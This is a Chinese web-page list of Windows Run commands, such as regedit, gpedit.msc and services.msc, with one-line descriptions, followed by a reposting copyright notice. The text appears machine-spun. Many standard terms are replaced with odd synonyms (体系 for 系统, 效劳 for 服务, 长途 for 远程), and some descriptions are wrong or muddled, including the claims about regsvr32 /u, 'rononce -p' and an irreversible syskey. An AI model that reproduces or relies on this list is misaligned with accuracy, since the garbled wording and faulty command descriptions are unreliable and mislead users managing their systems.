wupdmgrwindows更新程序
winver-查看Windows版别
wmimgmt.msc翻开windows办理体系结构
wupdmgrwindows更新程序
wscriptwindows脚本宿主设置
write写字板winmsd-体系信息
wiaacmgr-扫描仪和照相机导游
winchatXP自带局域网谈天
mem.exe显现内存运用状况
Msconfig.exe-体系装备有用程序
mplayer2-简易widnows media player
mspaint画图板
mstsc长途桌面衔接
mplayer2-媒体播放机
magnify放大镜有用程序
mmc翻开操控台
mobsync同步指令
dxdiag-查看DirectX信息
drwtsn32 体系医师
devmgmt.msc- 设备办理器
dfrg.msc-磁盘碎片收拾程序
diskmgmt.msc-磁盘办理有用程序
dcomcnfg-翻开体系组件效劳
ddeshare-翻开DDE同享设置
dvdplayDVD播放器
net stop messenger-中止信使效劳
net start messenger开端信使效劳
notepad翻开记事本
nslookup-网络办理的东西导游
ntbackup-体系备份和复原
narrator-屏幕"叙述人"
ntmsmgr.msc移动存储办理器
ntmsoprq.msc-移动存储办理员操作恳求
netstat -an(TC)指令查看接口
syncapp创立一个公文包
sysedit体系装备修正器
sigverif-文件签名验证程序
sndrec32-录音机
shrpubw创立同享文件夹
secpol.msc-本地安全策略
syskey-体系加密,一旦加密就不能解开,维护windows xp体系的两层暗码
services.msc-本地效劳设置
Sndvol32-音量操控程序
sfc.exe体系文件查看器
sfc /scannow-windows文件维护
tsshutdn-60秒倒计时关机指令
tourstartxp简介(装置完结后呈现的周游xp程序)
taskmgr使命办理器
eventvwr-事情查看器
eudcedit-造字程序
explorer-翻开资源办理器
packager-目标包装程序
perfmon.msc核算机功能监测程序
progman程序办理器
regedit.exe注册表
rsop.msc-组策略成果集
regedt32-注册表修正器
rononce -p 15秒关机
regsvr32 /u *.dll中止dll文件运转
regsvr32 /u zipfldr.dll撤销ZIP支撑
cmd.exeCMD指令提示符
chkdsk.exe-Chkdsk磁盘查看
certmgr.msc证书办理有用程序
calc-发动核算器
charmap发动字符映射表
cliconfg-SQL SERVER 客户端网络有用程序
Clipbrd剪贴板查看器
conf-发动netmeeting
compmgmt.msc-核算机办理
cleanmgr-**收拾
ciadv.msc索引效劳程序
osk翻开屏幕键盘
odbcad32-ODBC数据源办理器
oobe/msoobe /a查看XP是否激活
lusrmgr.msc本机用户和组
logoff-刊出指令
iexpress-木马绑缚东西,体系自带
Nslookup-IP地址侦测器
fsmgmt.msc-同享文件夹办理器
utilman辅助东西办理器
gpedit.msc-组策略

版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表娱乐之横扫全球立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章